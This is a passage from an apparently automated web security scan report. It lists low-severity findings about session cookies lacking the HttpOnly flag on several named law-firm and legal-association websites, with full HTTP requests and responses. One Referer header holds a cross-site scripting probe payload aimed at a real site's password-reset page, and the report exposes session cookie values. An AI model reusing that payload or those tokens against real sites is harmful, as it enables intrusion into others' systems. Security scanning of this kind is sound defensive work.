The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.memberize.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522804;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Set-Cookie: CFTOKEN=19f53deac5c145f8-E56630CB-D256-0A97-CE74511543FB5F25;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522804%26CFTOKEN%23%3D19f53deac5c145f8%2DE56630CB%2DD256%2D0A97%2DCE74511543FB5F25%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A30%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A30%27%7D%23hitcount%3D2%23cftoken%3D19f53deac5c145f8%2DE56630CB%2DD256%2D0A97%2DCE74511543FB5F25%23cfid%3D26522804%23;expires=Sat, 04-May-2041 18:09:30 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT
...[SNIP]...
18.28. http://www.milbank.com/en  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.milbank.com
Path:   /en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=fmlryg45wzcigeevcemlldb0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>
           Milbank Home Page</title>
       <meta content="
...[SNIP]...
18.29. http://www.ngelaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ngelaw.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Neal+Gerber+%26+Eisenberg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:09:37 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=trvllviilhf22545wok45z55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8220


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
       <title>Neal, Gerber & Eisenberg LLP</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
...[SNIP]...
18.30. http://www.njbiz.com/article.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.njbiz.com
Path:   /article.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.asp HTTP/1.1
Host: www.njbiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Length: 23058
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 12 May 2011 11:25:51 GMT
Last-Modified: Thu, 12 May 2011 16:55:51 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=273426946551164; path=/; expires=Fri, 11 May 2012 12:55:51 GMT
Set-Cookie: PBCSSESSIONID=273426946551164; path=/
Set-Cookie: PBCSSESSIONID=273426946551164; path=/
X-Passed-To: S260608AT1VW727, URL Rewrite on site N/A (2011-05-12 12:55:51:118)
X-Handled-By: S260608AT1VW727, Rewrite on site N/A
X-Actual-URL: S260608AT1VW727, (/apps/pbcs.dll/article?AID=/.asp)
X-Passed-To-DLL: S260608AT1VW727, (2011-05-12 12:55:51:118)
X-Passed-To-BeforeDispatch: S260608AT1VW727, on site NJ (2011-05-12 12:55:51:118)
X-Returned-From-BeforeDispatch: S260608AT1VW727, on site NJ (2011-05-12 12:55:51:868)
X-Passed-To-PostProcessResponse: S260608AT1VW727, on site NJ (2011-05-12 12:55:52:008)
X-Returned-From-PostProcessResponse: S260608AT1VW727, on site NJ (2011-05-12 12:55:52:008)
X-Returned-From-DLL: S260608AT1VW727 (2011-05-12 12:55:52:008)
X-Returned-From: S260608AT1VW727(2011-05-12 12:55:52:008)
Date: Thu, 12 May 2011 16:55:51 GMT
X-Cache: MISS from sxsquid04
X-Cache-Lookup: MISS from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
...[SNIP]...
18.31. http://www.njsba.com/calendar_events/annualMeetingBlog/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.njsba.com
Path:   /calendar_events/annualMeetingBlog/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /calendar_events/annualMeetingBlog/index.cfm HTTP/1.1
Host: www.njsba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:55:51 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=101798265;expires=Sat, 04-May-2041 16:55:13 GMT;path=/
Set-Cookie: CFTOKEN=72653901;expires=Sat, 04-May-2041 16:55:13 GMT;path=/
Set-Cookie: CFCLIENT_NJSBA=;expires=Sat, 04-May-2041 16:55:13 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D101798265%26CFTOKEN%23%3D72653901%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2012%3A55%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2012%3A55%3A51%27%7D%23hitcount%3D2%23cftoken%3D72653901%23cfid%3D101798265%23;expires=Sat, 04-May-2041 16:55:13 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!-- make sure all includes do not include header/footer html -->

<!-- application.cfm contains global root and application settings -->


<link rel="stylesheet" type="text/css" href="http://www
...[SNIP]...
18.32. http://www.nldhlaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nldhlaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Nelson+Levine+deLuca+%26+Horst&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 31346
Content-Type: text/html
Expires: Thu, 12 May 2011 14:29:07 GMT
Set-Cookie: ASPSESSIONIDAACCTASC=KOPDCFPBADJKBGLOBNJKLPMP; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND07-80=272686346.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>National Insurance Attorneys | Coverage &amp; Litigation Lawyers, Phila
...[SNIP]...
18.33. http://www.orangecountyala.org/clubportal/ocala/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.orangecountyala.org
Path:   /clubportal/ocala/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clubportal/ocala/ HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26523221;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Set-Cookie: CFTOKEN=8c9fadb1fcd2b998-E5685AEF-A651-1E8F-1BA89A8BCD46CACC;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523221%26CFTOKEN%23%3D8c9fadb1fcd2b998%2DE5685AEF%2DA651%2D1E8F%2D1BA89A8BCD46CACC%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A52%27%7D%23hitcount%3D2%23cftoken%3D8c9fadb1fcd2b998%2DE5685AEF%2DA651%2D1E8F%2D1BA89A8BCD46CACC%23cfid%3D26523221%23;expires=Sat, 04-May-2041 18:11:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head>
   <title>
   Orange County Chapter Association of Legal Administrators -
   </title>
   
   
           <meta name="keywords" content="Orange County Chapter Association of Legal Administr
...[SNIP]...
18.34. http://www.pillsburylaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819540;path=/
Set-Cookie: CFTOKEN=67420103;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
18.35. http://www.pillsburylaw.com/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
location: /index.cfm?pageid=12&itemid=1698
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
18.36. http://www.pillsburylaw.com/connect_forgotpassword.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:51:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
18.37. http://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?pageid=12&itemid=1908 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:44:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
18.38. http://www.pillsburylaw.com/scripts/images/arrows-default.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
location: /404.htm
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
18.39. http://www.powelltrachtman.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.powelltrachtman.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Powell+Trachtman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 32648
Content-Type: text/html
Expires: Thu, 12 May 2011 14:28:49 GMT
Set-Cookie: ASPSESSIONIDQSRQADRA=NLPBOPPBCENMJHPCICDDGMCG; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND13-80=1504003239.20480.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Commercial litigation/business transactions/business planning/risk mana
...[SNIP]...
18.40. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.powelltrachtman.com
Path:   /CM/Custom/Case-Studies.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CM/Custom/Case-Studies.asp HTTP/1.1
Host: www.powelltrachtman.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp
Cookie: ASPSESSIONIDASCDRDSB=MPBKIAACBIHGDJIDLNEFJILO; BIGipServerFIRMSND13-80=423943434.20480.0000; CP=null*; s_sess=%20flid%3D1305216538594%3B%20c_m%3Dpowell%252Btrachtmanwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Dpowell%252Btrachtman%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.powelltrachtman.com%253Apracticeareas%253Aemployment-claims-labor-relations.asp%255E%255Eread%2520more%255E%255Ewww.powelltrachtman.com%253Apracticeareas%253Aemployment-claims-labor-relations.asp%2520%257C%2520read%2520more%255E%255E%3B%20s_sq%3Dfindlaw-12282%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.powelltrachtman.com%2525253Apracticeareas%2525253Aemployment-claims-labor-relations.asp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.powelltrachtman.com%2525252FCM%2525252FCustom%2525252FCase-Studies.asp%25252523business%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216538598'%255D%255D%7C1463069338598%3B%20s_nr%3D1305216538601%7C1307808538601%3B%20s_vnum%3D1307808538599%2526vn%253D2%7C1307808538599%3B%20ch_directload%3D1%7C1305220380897%3B%20s_invisit%3Dtrue%7C1305220380898%3B%20omtr_lv%3D1305218580898%7C1399826580898%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220380898%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:43:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 69795
Content-Type: text/html
Expires: Thu, 12 May 2011 15:03:01 GMT
Set-Cookie: ASPSESSIONIDAQBCQCSB=KHDBOMPBGNPFDICHMIHNAFIN; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Recent Verdicts and Case Decisions | Accomplishments of Pennsylvania La
...[SNIP]...
